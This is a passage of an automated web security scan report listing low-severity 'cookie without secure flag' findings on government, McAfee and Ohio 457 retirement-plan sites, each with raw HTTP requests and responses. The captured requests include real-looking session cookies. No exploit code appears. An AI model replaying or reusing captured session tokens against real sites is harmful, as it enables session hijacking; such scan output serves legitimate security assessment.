Cookie: BIGipServer=348127242.20480.0000; __utmv=; JSESSIONID=cx3hS880vVX_KdjjM_; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.94.8.1304162601730;

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:30:07 GMT
Server: Apache
Location: http://www.colorado.gov/apps/feedback/servlet/begin
Vary: Accept-Encoding
Content-Length: 235
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServer=kB2L+3pjrddrIIEHgshLK90xd+63v/FKMQQe7ZjTkgYM2ND91AVrjihgZkommzfjTwym1t8J5orH8A==; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.colorado.gov/apps/feedback/servlet/b
...[SNIP]...

7.136. https://www.humanservices.state.pa.us/Compass.Web/CMHOM.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.humanservices.state.pa.us
Path:   /Compass.Web/CMHOM.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Compass.Web/CMHOM.aspx HTTP/1.1
Host: www.humanservices.state.pa.us
Connection: keep-alive
Referer: http://www.budget.state.pa.us/portal/server.pt/community/current_and_proposed_commonwealth_budgets/4566
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:41:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: LangCode=EN; path=/
Set-Cookie: Image=HomePagePhoto_5.jpg; path=/
Set-Cookie: HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 52074


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
COMPASS
</tit
...[SNIP]...

7.137. https://www.mcafeesecure.com/RatingVerify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mcafeesecure.com
Path:   /RatingVerify

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RatingVerify?ref=home.mcafee.com&lang=EN HTTP/1.1
Host: www.mcafeesecure.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: McAfeeSecure
Vary: Accept-Encoding
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: LANG=EN; path=/; expires=Mon, 05-Jan-2043 23:05:25 GMT
Set-Cookie: CAMEFROM=home.mcafee.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 29 Apr 2011 21:18:46 GMT
Set-Cookie: resin=1758093834.20480.0000; path=/
Content-Length: 10349


<html>
<head>

<!-- Google Website Optimizer Control Script -->
<script>
function utmx_section(){}function utmx(){}
(function(){var k='1568676568',d=document,l=d.location,c=d.cookie;fun
...[SNIP]...

7.138. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/Ohio457-site.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/css/dcdweb/Ohio457-site.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/css/dcdweb/Ohio457-site.css HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTHID=2B79DD6E72C9107208B8A4861F3DF71F; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:38 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=2CDEE64A72C910722281D874740EB2E6; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Tue, 26 Apr 2011 20:14:52 GMT
ETag: "20c0b9-4221-fa0c6700"
Accept-Ranges: bytes
Content-Length: 16929
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/css

/*START Reset Styles*/html,body,div,span,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,abbr,address,cite,code,del,dfn,em,img,ins,kbd,q,samp,small,strong,var,b,i,dl,dt,dd,ol,ul,li,fieldset,form,labe
...[SNIP]...

7.139. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/base-style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/css/dcdweb/base-style.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/css/dcdweb/base-style.css HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTHID=2B79DD6E72C9107208B8A4861F3DF71F; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:37 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=2C61FEFA72C910721065FD47DEDA6F26; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Mon, 31 Jan 2011 14:30:56 GMT
ETag: "1181a9-1e-43892800"
Accept-Ranges: bytes
Content-Length: 30
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/css

/* INTENTIONALLY LEFT BLANK */

7.140. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/print.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/css/dcdweb/print.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/css/dcdweb/print.css HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTHID=2B79DD6E72C9107208B8A4861F3DF71F; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:38 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=2CD9DA4272C9107208B9A4861F3DF71F; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Thu, 09 Jul 2009 14:10:28 GMT
ETag: "118209-4ab-6af43d00"
Accept-Ranges: bytes
Content-Length: 1195
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/css

#navigation,
#extra,
#help,
#viewPrintableCopyLink,
#buttons,
#primary-navigation,
#global-navigation,
#utility-navigation {
   display:none !important;
   }

* {
   overflow:visible !important;    
   bord
...[SNIP]...

7.141. https://www.nrsservicecenter.com/content/media/retail/images/AdTeasers/Ohio457/NewWelcomeBanner.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/AdTeasers/Ohio457/NewWelcomeBanner.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/AdTeasers/Ohio457/NewWelcomeBanner.jpg HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:44 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=3007D26E72C9107208C1A4861F3DF71F; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Thu, 24 Mar 2011 16:26:56 GMT
ETag: "11823c-d6ea-f221d400"
Accept-Ranges: bytes
Content-Length: 55018
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

......Exif..II*...........................b...........j...(...........1.......r...2...........i.................
..'....
..'..Adobe Photoshop CS5 Macintosh.2011-03-24T16:26:56-04:00...........0220....
...[SNIP]...

7.142. https://www.nrsservicecenter.com/content/media/retail/images/Logos/Ohio457.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/Logos/Ohio457.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/Logos/Ohio457.gif HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTHID=2B79DD6E72C9107208B8A4861F3DF71F; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:38 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=2CD9FB4472C910721FE181E018D630EF; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Fri, 07 Jul 2006 20:13:02 GMT
ETag: "248065-1958-7dd62f80"
Accept-Ranges: bytes
Content-Length: 6488
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..F....    
......YVW..........$.c$".......TK.......+!...IFG.............(#urs........$.ia.......}w............)%&.......,#856......|z{......ebcmjk....F>7$$....un.2).`X.>5". .!... ............wuup
...[SNIP]...

7.143. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradient.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/Ohio457/bgGrads/bgGradient.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/Ohio457/bgGrads/bgGradient.jpg HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:42 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=2ED0E93072C910722284D874740EB2E6; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Tue, 25 Jan 2011 14:40:55 GMT
ETag: "1780fa-477-b430ebc0"
Accept-Ranges: bytes
Content-Length: 1143
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

......JFIF.....H.H.....hExif..II*...............>...........F...(...........1.......N.......H.......H.......Paint.NET v3.5.6.....C....................................................................C.
...[SNIP]...

7.144. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradientAcctLogin.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/Ohio457/bgGrads/bgGradientAcctLogin.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/Ohio457/bgGrads/bgGradientAcctLogin.jpg HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:43 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=2F69EA9072C9107213D2B514D844AB71; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Tue, 25 Jan 2011 16:52:24 GMT
ETag: "5c004-646-8a698200"
Accept-Ranges: bytes
Content-Length: 1606
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

......Exif..II*.......1.......2...2.......P...i.......j.......Adobe Photoshop CS5 Macintosh.2011-01-25T16:52:24-05:00...........0220    .................................................Ducky.......d.....
...[SNIP]...

7.145. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradientHomeContentAreas.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/Ohio457/bgGrads/bgGradientHomeContentAreas.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/Ohio457/bgGrads/bgGradientHomeContentAreas.jpg HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:44 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=300926FA72C91072228FD874740EB2E6; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Tue, 25 Jan 2011 16:44:12 GMT
ETag: "1780fc-64e-6d162f00"
Accept-Ranges: bytes
Content-Length: 1614
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

......Exif..II*.......1.......2...2.......P...i.......j.......Adobe Photoshop CS5 Macintosh.2011-01-25T16:44:12-05:00...........0220    .................................................Ducky.......d.....
...[SNIP]...

7.146. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/navTabs/tabLeft.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/Ohio457/navTabs/tabLeft.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/Ohio457/navTabs/tabLeft.gif HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:42 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=2ED168B072C91072106DFD47DEDA6F26; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Thu, 10 Mar 2011 17:28:09 GMT
ETag: "1780fe-279-2b481c40"
Accept-Ranges: bytes
Content-Length: 633
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..K...............................................................................................................................................................................................
...[SNIP]...

7.147. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/navTabs/tabRight.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/Ohio457/navTabs/tabRight.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/Ohio457/navTabs/tabRight.gif HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:44 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=3017DBFA72C9107208C2A4861F3DF71F; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Thu, 10 Mar 2011 17:28:01 GMT
ETag: "1780ff-5c5-2ace0a40"
Accept-Ranges: bytes
Content-Length: 1477
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..K...............................................................................................................................................................................................
...[SNIP]...

7.148. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/sprites/login-button.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/Ohio457/sprites/login-button.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/Ohio457/sprites/login-button.gif HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:44 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=302A2BC072C910721079FD47DEDA6F26; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Wed, 26 Jan 2011 20:14:05 GMT
ETag: "178101-13b-79877d40"
Accept-Ranges: bytes
Content-Length: 315
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a(......................................................................................................,....(...... .Y....4......Rt.W.DHB.$..pH.*.G."0.`>...H........H...t..v...z.n.....s.l0C!...
...[SNIP]...

7.149. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/sprites/login-lock.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/Ohio457/sprites/login-lock.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/Ohio457/sprites/login-lock.gif HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:44 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=301B239672C910722137D51D41D1E762; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Tue, 25 Jan 2011 16:29:01 GMT
ETag: "47001d-24d-36c96d40"
Accept-Ranges: bytes
Content-Length: 589
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a....|.b_d......ebg.........pmr.............|..............}.........................}y~...............JHN..mjo......zw{...xuzkhm.................^[a.......~.vsx............spu................
...[SNIP]...

7.150. https://www.nrsservicecenter.com/content/media/retail/js/wtlOhio.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/js/wtlOhio.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/js/wtlOhio.js HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

